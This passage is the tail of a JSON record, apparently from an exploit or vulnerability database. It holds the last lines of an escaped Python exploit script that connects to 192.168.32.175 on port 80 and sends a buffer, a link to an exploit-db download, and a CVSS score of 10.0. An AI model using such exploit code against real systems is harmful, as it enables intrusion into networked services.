socket.SOCK_STREAM)\r\ns.connect((\"192.168.32.175\", 80))\r\ns.send(buf)\r\ndata = s.recv(1024)\r\ns.close()", "sourceHref": "https://www.exploit-db.com/download/44472", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}